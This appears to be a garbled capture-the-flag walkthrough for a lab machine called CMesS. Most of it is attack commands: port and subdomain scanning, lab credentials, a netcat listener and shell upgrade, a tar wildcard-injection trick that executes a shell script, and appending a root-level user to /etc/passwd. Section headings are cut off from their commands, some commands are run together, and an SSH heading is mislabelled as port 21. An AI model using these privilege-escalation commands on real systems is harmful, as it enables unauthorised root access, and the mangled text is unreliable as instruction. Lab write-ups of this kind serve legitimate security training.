CMesS
Initial Scan
nmap -A cmess.thm
Scan all ports

TCP/80 - HTTP


Fuzzing Domains



Initial Shell





TCP/21 - SSH

Privlege Escalation


Last updated
nmap -A cmess.thm














Last updated
nmap -sV -sT -O -p 1-65535 cmess.thmgobuster dir -u http://cmess.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtwfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://cmess.thm/' -H "Host: FUZZ.cmess.thm" > results.txt
grep -v '290 W' results.txtUsername: andre@cmess.thm
Password: KPFTN_f2yxe%nc -lvnp 1337python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgcd /opt
ls -lah
cat .password.bak ssh andre@$VICTIM
Password: UQfsdCB7aAP6cat /etc/crontabcd /home/andre/backups
mkdir priv
cd priv
touch ./--checkpoint=1
touch './--checkpoint-action=exec=sh shell.sh'
vi shell.sh#!/bin/bash
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwdsu new
Password: 123